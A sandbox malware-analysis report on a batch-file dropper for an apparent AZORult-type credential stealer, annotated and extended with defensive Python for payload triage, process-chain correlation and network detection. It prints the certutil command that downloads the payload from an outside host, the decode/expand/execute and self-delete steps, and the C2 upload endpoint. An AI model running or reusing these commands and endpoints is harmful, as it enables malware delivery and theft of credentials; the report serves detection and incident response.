VT6784985745.bat
This report is generated from a file or URL submitted to this webservice on July 12th 2018 16:54:49 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v8.10 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware: POSTs files to a webserver
- Stealer/Phishing: Scans for artifacts that may help identify the target
- Persistence: Spawns a lot of processes
- Fingerprint: Reads the active computer name; Reads the cryptographic machine GUID; Scans for artifacts that may help identify the target
- Network Behavior: Contacts 3 domains and 3 hosts
MITRE ATT&CK™ Techniques Detection
Additional Context
Related Sandbox Artifacts
- Associated SHA256s: 8d47306e29f859c02d9d0b82a58df4cb58e7ec88ffdaeacbc0264d8ca31b7f02
Indicators
Not all malicious and suspicious indicators are displayed in this report.

Malicious Indicators (9)

Anti-Detection/Stealthiness

Found a system process name at an unusual pathway
- details: Process "sort.exe" has a system process name but is not located in a Windows (sub-)directory
- source: Monitored Target
- relevance: 3/10
- ATT&CK ID: T1036

Uses certutil to decode a file (seen on targeted attacks)
- details: Process "certutil.exe" with commandline "certutil -decode %TEMP%\ercg345c24.txt %TEMP%\ercg345c24.cab"
- source: Monitored Target
- relevance: 10/10
- ATT&CK ID: T1140
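Recovering the staged payload offline. The certutil indicators on this page are the delivery mechanism: the response fetched from login.php was base64 text, `certutil -decode` turned it into a .cab, and (further down in the process list) expand unpacked that .cab into ercg345c24.exe. During triage you want the .cab and its header without re-running certutil or expand on the artifact. The Python below is an added example for this page, not code from the Hybrid Analysis report or from the sample: it replicates the decode step (certutil accepts base64 with or without the BEGIN/END CERTIFICATE wrapper lines) and parses the cabinet CFHEADER, which also tells you whether the download was truncated. The staged text it decodes is constructed around a stand-in cabinet header; the real ercg345c24.txt is not reproduced here.

```python
"""Recover a certutil-staged payload the way 'certutil -decode' and 'expand' see it.

Replicates the base64 decode offline and triages the result as a Microsoft
Cabinet (CFHEADER only). Added example; not part of the sandbox report.
"""
import base64
import re
import struct

# certutil -decode accepts base64 with or without PEM-style wrapper lines.
PEM_LINE = re.compile(r"^-----(BEGIN|END) [A-Z ]+-----$")

# CFHEADER of a Microsoft Cabinet (36 bytes, little-endian): signature, reserved1,
# cbCabinet, reserved2, coffFiles, reserved3, versionMinor, versionMajor,
# cFolders, cFiles, flags, setID, iCabinet.
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")


def certutil_decode(text):
    """Base64-decode like 'certutil -decode': drop BEGIN/END lines and whitespace."""
    kept = [ln.strip() for ln in text.splitlines() if not PEM_LINE.match(ln.strip())]
    return base64.b64decode(re.sub(r"\s+", "", "".join(kept)), validate=True)


def cab_header(blob):
    """Return the key CFHEADER fields, or None if the blob is not a cabinet."""
    if len(blob) < CFHEADER.size or blob[:4] != b"MSCF":
        return None
    (_sig, _r1, cb_cabinet, _r2, coff_files, _r3, ver_minor, ver_major,
     c_folders, c_files, flags, set_id, i_cabinet) = CFHEADER.unpack_from(blob)
    return {
        "size": cb_cabinet,
        "declared_size_matches": cb_cabinet == len(blob),  # False => truncated download
        "first_cffile_offset": coff_files,
        "version": f"{ver_major}.{ver_minor}",
        "folders": c_folders,
        "files": c_files,
        "flags": flags,
        "set_id": set_id,
        "cabinet_index": i_cabinet,
    }


def triage_staged_file(text):
    """Decode a certutil-staged text file and triage the result as a cabinet."""
    return cab_header(certutil_decode(text))


# --- constructed sample data (stand-ins for ercg345c24.txt / ercg345c24.cab) ---

def build_sample_cab(filler=b"\x00" * 28):
    """A CFHEADER followed by filler. A real cabinet carries CFFOLDER/CFFILE/CFDATA
    records here; only the header is needed to exercise the triage."""
    total = CFHEADER.size + len(filler)
    header = CFHEADER.pack(b"MSCF", 0, total, 0, CFHEADER.size + 8, 0,
                           3, 1, 1, 1, 0, 0x1234, 0)
    return header + filler


def build_staged_text(blob):
    """Base64 with the PEM-style wrapper that 'certutil -encode' produces."""
    return ("-----BEGIN CERTIFICATE-----\n"
            + base64.encodebytes(blob).decode()
            + "-----END CERTIFICATE-----\n")


if __name__ == "__main__":
    print(triage_staged_file(build_staged_text(build_sample_cab())))
    # Anything that is not a cabinet (e.g. a raw PE image) is reported as None.
    print(triage_staged_file(build_staged_text(b"MZ" + b"\x00" * 62)))
```

If `declared_size_matches` is False on a real artifact, the .txt captured from the host is incomplete and expand would have failed on it; that is worth knowing before concluding the payload never ran.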

External Systems

Detected Suricata Alert
- details:
  - Detected alert "ETPRO POLICY Observed MS Certutil User-Agent in HTTP Request" (SID: 2829988, Rev: 2, Severity: 1) categorized as "Potential Corporate Privacy Violation"
  - Detected alert "ETPRO TROJAN AZORult Variant.3 Checkin M1" (SID: 2829890, Rev: 3, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
  - Detected alert "ETPRO TROJAN AZORult Variant.3 Checkin M2" (SID: 2831079, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
  - Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
- source: Suricata Alerts
- relevance: 10/10

Installation/Persistence

Drops executable files to the Windows system directory
- details:
  - File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-synch-l1-2-0.dll"
  - File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-file-l1-2-0.dll"
  - File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-processthreads-l1-1-1.dll"
  - File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-timezone-l1-1-0.dll"
  - File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-file-l2-1-0.dll"
  - File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-localization-l1-2-0.dll"
- source: Binary File
- relevance: 7/10

Network Related

Found more than one unique User-Agent
- details: Found the following User-Agents: "Microsoft-CryptoAPI/6.1", "CertUtil URL Agent"
- source: Network Traffic
- relevance: 5/10

Spyware/Information Retrieval

Detected network related fingerprinting/snooping attempt
- details: Process "certutil.exe" with commandline "certutil -urlcache -split -f http://www.illumania.net/login.php %TEMP%\ercg345c24.txt"
- source: Monitored Target
- relevance: 10/10
- ATT&CK ID: T1087
- note: the command is a file download by certutil (-urlcache -split -f fetches the URL to the given path); the fingerprinting/T1087 label is the sandbox heuristic's.

Scans for artifacts that may help identify the target
- details:
  - "ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676")
  - "ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000001")
  - "ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000002")
  - "ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000003")
  - "ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\15.0\OUTLOOK\PROFILES\OUTLOOK")
  - "ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\16.0\OUTLOOK\PROFILES\OUTLOOK")
- source: Registry Access
- relevance: 3/10
- ATT&CK ID: T1012
- note: these are the Outlook profile keys (the 9375CFF0413111D3B88A00104B2A6676 subkey and its 0000000n children hold per-account settings, including stored mail-server credentials), so this entry is credential harvesting rather than generic reconnaissance.

Unusual Characteristics

References suspicious system modules
- details (string from memory; line breaks restored, the string is truncated in the report):
  "193.70.47.200:ITEMachineID : 18F76D5-A343A2EC-6B6BB927-99B5A429-0310E858A
  EXE_PATH : %TEMP%\ercg345c24.exe
  Windows : 6.1 x64 Windows 7 Professional
  Computer(Username) : HAPUBWS-PC(HAPUBWS)
  Screen: 1024x611
  Layouts: EN/EN/
  LocalTime: 12/7/2018 16:58:39
  Zone: UTC+1:0
  CPU Model: Intel(R) Xeon(R) CPU E5-2680 v4 @ 2.40GHz
  CPU Count: 2
  GetRAM: 8191
  Video Info: VirtualBox Graphics Adapter, RDPDD Chained DD, RDP Encoder Mirror Driver, RDP Reflector Display Driver
  Process list: [System Process], System, smss.exe, csrss.exe, wininit.exe, services.exe, svchost.exe, WmiPrvSE.exe, WmiPrvSE.exe, svchost.exe, svchost.exe, svchost.exe, dwm.exe, svchost.exe, svchost.exe, svchost.exe, spoolsv.exe, svchost.exe, taskhost.exe, svchost.exe, svchost.exe, taskhost.exe, lsass.exe, lsm.exe, csrss.exe, conhost.exe, conhost.exe, conhost.exe, conhost.exe, winlogon.exe, explorer.exe, cmd.exe, ercg345c24.exe +
  [Soft]: Adobe AIR(27.0.0.124), Adobe Flash Player 27 ActiveX(27.0.0.187), Adobe Shockwave Player 12.3(12.3.1.201), AutoIt v3.3.14.2(3.3.14.2), WinPcap 4.1.3(4.1.0.2980), Java 8 Update 151(8.0.1510.12), Java 'lG["
- source: File/Memory
- relevance: 5/10
- ATT&CK ID: T1215
- note: this is the victim profile the sample assembled in memory (machine ID, executable path, OS, user, screen, locale, time zone, hardware, running processes, installed software); the "system modules" heuristic fired on the process names inside it. The VirtualBox adapter and Xeon CPU identify the sandbox guest.
Spawns a lot of processes
- details:
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c ""C:\VT6784985745.bat" ""
  - Spawned process "certutil.exe" with commandline "certutil -urlcache -split -f http://www.illumania.net/login.php %TEMP%\ercg345c24.txt"
  - Spawned process "certutil.exe" with commandline "certutil -decode %TEMP%\ercg345c24.txt %TEMP%\ercg345c24.cab"
  - Spawned process "expand.exe" with commandline "expand %TEMP%\ercg345c24.cab %TEMP%\ercg345c24.exe"
  - Spawned process "ercg345c24.exe"
  - Spawned process "sort.exe"
  - Spawned process "cmd.exe" with commandline "/c timeout 4 & del "ercg345c24.exe""
- source: Monitored Target
- relevance: 8/10
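Reconstructing the chain from endpoint telemetry. The spawn list above is the whole delivery: cmd.exe runs the batch, certutil downloads and then decodes, expand unpacks, ercg345c24.exe runs, sort.exe starts from outside a Windows directory, and a delayed `cmd /c timeout 4 & del` removes the dropper. The Python below is an added example for this page, not part of the Hybrid Analysis report: it correlates process-creation records in Sysmon event 1 form (pid, parent pid, image, command line) by the shared temp-file stem so the four staging steps surface as one chain, and separately flags a Windows tool name running outside C:\Windows (the T1036 indicator above) and the self-delete. The records are constructed from the command lines in the report; PIDs 3852 and 2260 are the reported ones, the other PIDs and the full paths are assumed. The rule names use T1105 for the certutil download and T1140 for the decode; the report's own heuristic files the download under T1087.

```python
"""Correlate the certutil/expand staging chain from process-creation records.

Sysmon event-1 style input (pid, ppid, image, cmdline). Added example for this
page; not code from the sandbox report or the sample.
"""
import ntpath
import re
from dataclasses import dataclass

# Windows-shipped tool names that appear in this chain; one of these running
# from outside C:\Windows is treated as masquerading (T1036).
WINDOWS_TOOL_NAMES = {"sort.exe", "certutil.exe", "expand.exe", "cmd.exe", "timeout.exe"}

RE_DOWNLOAD = re.compile(r"-urlcache\b.*?-f\s+(https?://\S+)\s+(\S+)", re.I)
RE_DECODE = re.compile(r"-decode\s+(\S+)\s+(\S+)", re.I)
RE_EXPAND = re.compile(r"\bexpand(?:\.exe)?\s+(\S+)\s+(\S+)", re.I)
RE_SELFDEL = re.compile(r'timeout\s+\d+\s*&\s*del\s+"?([^"\s]+)', re.I)
CHAIN_STAGES = {"download", "decode", "expand", "execute"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


def stem(path):
    """'%TEMP%\\ercg345c24.cab' -> 'ercg345c24': the key that links the stages."""
    return ntpath.splitext(ntpath.basename(path))[0].lower()


def is_masquerade(image):
    """A Windows tool name whose image is not under C:\\Windows (T1036)."""
    name = ntpath.basename(image).lower()
    return name in WINDOWS_TOOL_NAMES and not image.lower().startswith("c:\\windows\\")


def analyze(events):
    """Return (findings, chains): findings are (rule, pid, detail) tuples, chains
    are the temp-file stems for which all four staging steps were observed."""
    findings = []
    stages = {}  # stem -> {stage: pid}

    def mark(path, stage, pid):
        stages.setdefault(stem(path), {})[stage] = pid

    for ev in events:
        name = ntpath.basename(ev.image).lower()
        if name == "certutil.exe":
            if m := RE_DOWNLOAD.search(ev.cmdline):
                findings.append(("T1105-certutil-download", ev.pid, m.group(1)))
                mark(m.group(2), "download", ev.pid)
            if m := RE_DECODE.search(ev.cmdline):
                findings.append(("T1140-certutil-decode", ev.pid, m.group(2)))
                mark(m.group(2), "decode", ev.pid)
        elif name == "expand.exe":
            m = RE_EXPAND.search(ev.cmdline)
            if m and m.group(2).lower().endswith(".exe"):
                findings.append(("expand-cab-to-exe", ev.pid, m.group(2)))
                mark(m.group(2), "expand", ev.pid)
        elif name == "cmd.exe":
            if m := RE_SELFDEL.search(ev.cmdline):
                findings.append(("delayed-self-delete", ev.pid, m.group(1)))
                mark(m.group(1), "selfdel", ev.pid)
        elif stem(ev.image) in stages:
            # The unpacked binary itself was started.
            mark(ev.image, "execute", ev.pid)
        if is_masquerade(ev.image):
            findings.append(("T1036-masquerade", ev.pid, ev.image))

    chains = [s for s, seen in stages.items() if CHAIN_STAGES <= seen.keys()]
    return findings, chains


# Constructed from the command lines in the report. PIDs 3852 and 2260 are the
# reported ones; the other PIDs and the full paths are assumed.
TEMP = r"C:\Users\HAPUBWS\AppData\Local\Temp"
SAMPLE_EVENTS = [
    ProcEvent(1500, 1200, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\VT6784985745.bat" "'),
    ProcEvent(1520, 1500, r"C:\Windows\SysWOW64\certutil.exe",
              rf"certutil -urlcache -split -f http://www.illumania.net/login.php {TEMP}\ercg345c24.txt"),
    ProcEvent(1540, 1500, r"C:\Windows\SysWOW64\certutil.exe",
              rf"certutil -decode {TEMP}\ercg345c24.txt {TEMP}\ercg345c24.cab"),
    ProcEvent(1560, 1500, r"C:\Windows\SysWOW64\expand.exe",
              rf"expand {TEMP}\ercg345c24.cab {TEMP}\ercg345c24.exe"),
    ProcEvent(3852, 1500, rf"{TEMP}\ercg345c24.exe", rf"{TEMP}\ercg345c24.exe"),
    ProcEvent(2260, 3852, rf"{TEMP}\1Mo\sort.exe", rf"{TEMP}\1Mo\sort.exe"),
    ProcEvent(2300, 3852, r"C:\Windows\system32\cmd.exe",
              r'cmd /c timeout 4 & del "ercg345c24.exe"'),
]

if __name__ == "__main__":
    found, chains = analyze(SAMPLE_EVENTS)
    for finding in found:
        print(finding)
    print("staging chains:", chains)
```

Keying on the temp-file stem is what turns four individually low-signal events (certutil and expand are legitimate tools) into one high-confidence finding; an incomplete chain, for instance download and decode without an execution, is still reported through the individual findings but not as a chain.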

Suspicious Indicators (19)

Anti-Detection/Stealthiness

Queries kernel debugger information
- details: "certutil.exe" at 00011325-00003948-00000033-29986320382
- source: API Call
- relevance: 6/10

Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details: "certutil.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source: Registry Access
- relevance: 3/10
- ATT&CK ID: T1012

Environment Awareness

Contains ability to measure performance
- details: rdtsc
- source: Hybrid Analysis Technology
- relevance: 10/10

Contains ability to query CPU information
- details:
  - cpuid from ercg345c24.exe (PID: 3852)
  - cpuid from sort.exe (PID: 2260)
  - cpuid
- source: Hybrid Analysis Technology
- relevance: 10/10
- ATT&CK ID: T1082

Reads the active computer name
- details:
  - "certutil.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  - "ercg345c24.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source: Registry Access
- relevance: 5/10
- ATT&CK ID: T1012

Reads the cryptographic machine GUID
- details:
  - "certutil.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  - "ercg345c24.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1012
- note: the certutil.exe reads of these keys are part of its normal operation; the ercg345c24.exe reads are the sample's own and match the machine-ID and computer-name fields in the profile string above.

General

Opened the service control manager
- details: "ercg345c24.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source: API Call
- relevance: 10/10
- ATT&CK ID: T1035
- note: SC_MANAGER_CONNECT alone does not allow creating or starting a service, and no service creation appears elsewhere in this report.

POSTs files to a webserver
- details:
  - POST /azs/index.php HTTP/1.0 (Host: login.giocherialaragnatela.it; Connection: close; Content-Length: 113; Accept-Language: en-US; Content-Type: application/octet-stream) with no payload
  - POST /azs/index.php HTTP/1.0 (Host: login.giocherialaragnatela.it; Connection: close; Content-Length: 972929; Accept-Language: en-US; Content-Type: application/octet-stream) with no payload
- source: Network Traffic
- relevance: 5/10
- note: two requests to the same URL, a 113-byte body followed by a 972929-byte one, are consistent with a check-in followed by a bulk upload of collected data; these are the requests the Suricata "AZORult Variant.3 Checkin" rules above alerted on. "With no payload" means the bodies were not captured in the report.
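Matching the network pattern from request heads. Two things in this report's traffic are worth a rule: the download carried the "CertUtil URL Agent" User-Agent (the ETPRO alert above), and the two POSTs to /azs/index.php were a 113-byte body followed by a 972929-byte application/octet-stream body to the same URL over HTTP/1.0. The Python below is an added example for this page, not part of the report: it parses raw HTTP request heads and emits both findings. The GET head is constructed (User-Agent from the report, the other GET headers assumed); the two POST heads carry exactly the header values shown above; the size thresholds are assumptions. "Microsoft-CryptoAPI/6.1", the other agent the report lists, is deliberately not flagged because it is the ordinary Windows CRL/OCSP fetch agent.

```python
"""Flag a certutil download and a check-in-then-upload POST pair from raw HTTP
request heads. Added example for this page; not part of the sandbox report."""
from collections import defaultdict

# Thresholds are assumptions for this example, not values taken from the report.
CHECKIN_MAX_BYTES = 1024       # a short identifier/beacon body
UPLOAD_MIN_BYTES = 64 * 1024   # a bulk upload of collected data

# Only the certutil agent is flagged; "Microsoft-CryptoAPI/<ver>" is the normal
# Windows CRL/OCSP fetch agent and would be noisy.
FLAGGED_AGENT_PREFIX = "certutil url agent"


def parse_request_head(raw):
    """Parse an HTTP request head (CRLF-separated lines, ending at a blank line)."""
    lines = raw.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def classify(request_heads):
    """Return (rule, host, target, detail) findings for request heads given in
    capture order."""
    findings = []
    posts = defaultdict(list)   # (host, target) -> [(length, content-type, version)]
    for raw in request_heads:
        req = parse_request_head(raw)
        hdr = req["headers"]
        host, target = hdr.get("host", ""), req["target"]
        agent = hdr.get("user-agent", "")
        if agent.lower().startswith(FLAGGED_AGENT_PREFIX):
            findings.append(("certutil-download", host, target, agent))
        if req["method"] == "POST":
            posts[(host, target)].append((int(hdr.get("content-length", "0")),
                                          hdr.get("content-type", "").lower(),
                                          req["version"]))
    for (host, target), seq in posts.items():
        first_len, _, version = seq[0]
        # A short first body followed by a large octet-stream body to the same URL.
        bulk = [n for n, ctype, _ in seq[1:]
                if n >= UPLOAD_MIN_BYTES and ctype == "application/octet-stream"]
        if first_len <= CHECKIN_MAX_BYTES and bulk:
            findings.append(("checkin-then-upload", host, target,
                             f"{first_len} B then {max(bulk)} B over {version}"))
    return findings


# Constructed request heads. The GET reproduces the certutil fetch of login.php
# (User-Agent per the report; the other GET headers are assumed). The two POSTs
# carry exactly the header values the report shows.
SAMPLE_REQUESTS = [
    "GET /login.php HTTP/1.1\r\nHost: www.illumania.net\r\n"
    "User-Agent: CertUtil URL Agent\r\nConnection: Keep-Alive\r\n\r\n",
    "POST /azs/index.php HTTP/1.0\r\nHost: login.giocherialaragnatela.it\r\n"
    "Connection: close\r\nContent-Length: 113\r\nAccept-Language: en-US\r\n"
    "Content-Type: application/octet-stream\r\n\r\n",
    "POST /azs/index.php HTTP/1.0\r\nHost: login.giocherialaragnatela.it\r\n"
    "Connection: close\r\nContent-Length: 972929\r\nAccept-Language: en-US\r\n"
    "Content-Type: application/octet-stream\r\n\r\n",
]

if __name__ == "__main__":
    for finding in classify(SAMPLE_REQUESTS):
        print(finding)
```

The pairing rule fires only when both halves are seen for the same host and path, so a single large upload from a legitimate client is not enough on its own; on real captures, run it per client IP so beacons from different hosts are not merged.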

Installation/Persistence

Allocates virtual memory in a remote process
- details: "cmd.exe" allocated memory in "\Device\MountPointManager"
- source: API Call
- relevance: 7/10
- ATT&CK ID: T1055

Drops executable files
- details:
  - "api-ms-win-core-synch-l1-2-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "api-ms-win-core-datetime-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "sort.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  - "api-ms-win-core-memory-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "vcruntime140.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "ucrtbase.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "api-ms-win-crt-heap-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "api-ms-win-crt-process-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "nss3.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
  - "api-ms-win-crt-conio-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "mozglue.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
  - "api-ms-win-crt-math-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "api-ms-win-crt-utility-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "api-ms-win-core-util-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "api-ms-win-crt-environment-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "api-ms-win-core-file-l1-2-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "api-ms-win-core-libraryloader-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "api-ms-win-crt-stdio-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "api-ms-win-crt-multibyte-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
  - "api-ms-win-core-processthreads-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
- source: Binary File
- relevance: 10/10
- note: apart from the api-ms-win-* forwarders and the CRT (vcruntime140.dll, ucrtbase.dll), the drops include nss3.dll and mozglue.dll, the Mozilla libraries a stealer needs to read Firefox-family credential stores, and the sort.exe flagged for masquerading above.

Writes data to a remote process
- details:
  - "cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\SysWOW64\certutil.exe" (Handle: 128)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 128)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 128)
  - "cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 128)
  - "cmd.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 120)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 120)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 120)
  - "cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 120)
  - "cmd.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\expand.exe" (Handle: 120)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\expand.exe" (Handle: 120)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\expand.exe" (Handle: 120)
  - "cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\expand.exe" (Handle: 120)
- source: API Call
- relevance: 6/10
- note: the same 32/52/4/8-byte write sequence goes to every child that cmd.exe starts, including the built-in expand.exe, so it is a process-startup artifact of the monitored environment rather than code injection by the sample.

Spyware/Information Retrieval

Found an instant messenger related domain
- details (strings from network.pcap; the tab and newline delimiters of the cookie rows and domain list were lost in extraction):
"10149366_pk_uid0%3DczoxNjoiYjg1ZmYxOGY4MTJkNTMwYSI7%3A_%3D0b4124c3f68703523c69e4f78478b81bb26b1f5fad-m.asiaFALSE/FALSE1610149366uidGgcd4dRWLNadtechus.comFALSE/FALSE1610149366JEB25A2EABA76E651AAEACFA26A4F6779337adtechus.comFALSE/FALSE1610149366ADMARKMon, 11 Dec 2017 17:17:02 GMTadtechus.comFALSE/FALSE1610149366APIDDAe8b48c64-de91-11e7-9669-00163e3d397dadtechus.comFALSE/FALSE1610149366APIDTS1513012532qip.ruFALSE/FALSE1610149366weather8cce5c9f22fede6d5188de4ff82c3c71bec1cabd855ecb56f51863d4b95843f7a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22weather%22%3Bi%3A1%3Bi%3A1%3B%7Dqip.ruFALSE/FALSE1610149366traffic35316ca82541db6674b3904ede5b46c2387c1e4ade7948fba472a4f80a3acb92a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22traffic%22%3Bi%3A1%3Bi%3A1%3B%7Dqip.ruFALSE/FALSE1610149366rb_shows25b2%261fqip.ruFALSE/FALSE1610149366rb_shows_day25b2-1%261f-1qip.ruFALSE/FALSE1610149366topLineSplit907qip.ruFALSE/FALSE1610149366_ym_uid1512498881708287895qip.ruFALSE/FALSE1610149366_gaGA1.2.1299367368.1512498873qip.ruFALSE/FALSE1610149366_gidGA1.2.1767792141.1512498881qip.ruFALSE/FALSE1610149366_ym_isad2qip.ruFALSE/FALSE1610149366_ym_visorc_24433871wmylife.comFALSE/FALSE1610149366usidb2b44c3d-bf68-4b4e-86df-8baf57094b49mylife.comFALSE/FALSE1610149366_uetsid_uet71bd3ac2mylife.comFALSE/FALSE1610149366_gaGA1.2.1343893056.1512497650mylife.comFALSE/'lG[." (Indicator: "qip.ru"; File: "network.pcap")
"511&nv=4&t=-&v=-&p=-&si=-&sn=-&od=none&op=-&ok=-&om=-&ob=-&oc=-&os=-&w=800&h=600&cd=24&f=27.0%20r0&g=-"cam.demdex.netFALSE/FALSE1610149366cam35928446970140592741233483160203094364dicascidade.com.brFALSE/FALSE1610149366__cfduidde37010b7dd940b30970ab2a5d67c5add1513011339global.blackberry.comFALSE/FALSE1610149366_gaGA1.3.1948344527.1512497695global.blackberry.comFALSE/FALSE1610149366_gidGA1.3.1357511246.1512497695mail.twc.comFALSE/FALSE1610149366sto-idGFEAAOGLmail.twc.comFALSE/FALSE1610149366aam_sc_twccaam_twcc%3D1mail.twc.comFALSE/FALSE1610149366aam_uuid35928446970140592741233483160203094364local.comFALSE/FALSE1610149366localcomcid=710&loc=Los+Angeles%2c+CA&ll=34.040729%2c-118.297396&zip=90001&kw=&uid=ed71465a-7f84-4b3d-a201-a16feb1e6c5e&ci=en&expdate=636511715975266649local.comFALSE/FALSE1610149366localcom_ybcid=&sid=6b86b7ea-d772-4bfa-a109-75637b6990f2&exp=636485813975266649local.comFALSE/FALSE1610149366locmpxeyJ1aWQiOiJlZDcxNDY1YS03Zjg0LTRiM2QtYTIwMS1hMTZmZWIxZTZjNWUifQ==local.comFALSE/FALSE1610149366locmpx.sigBOx3yNLwYFoO7bb46b2Y2asBe6Qlocal.comFALSE/FALSE1610149366__gadsID=1c286ee58a3c553c:T=1513011600:S=ALNI_MamozLKRMli_giWY3aDrjvuT5iqMglocal.comFALSE/FALSE1610149366_gaGA1.2.260031554.1512498081local.comFALSE/FALSE1610149366_gidGA1.2.1151867283.1512498087local.comFALSE/FALSE1610149366s_nr1512498087489local.comFA'lG[" (Indicator: "blackberry.com"; File: "network.pcap"), 
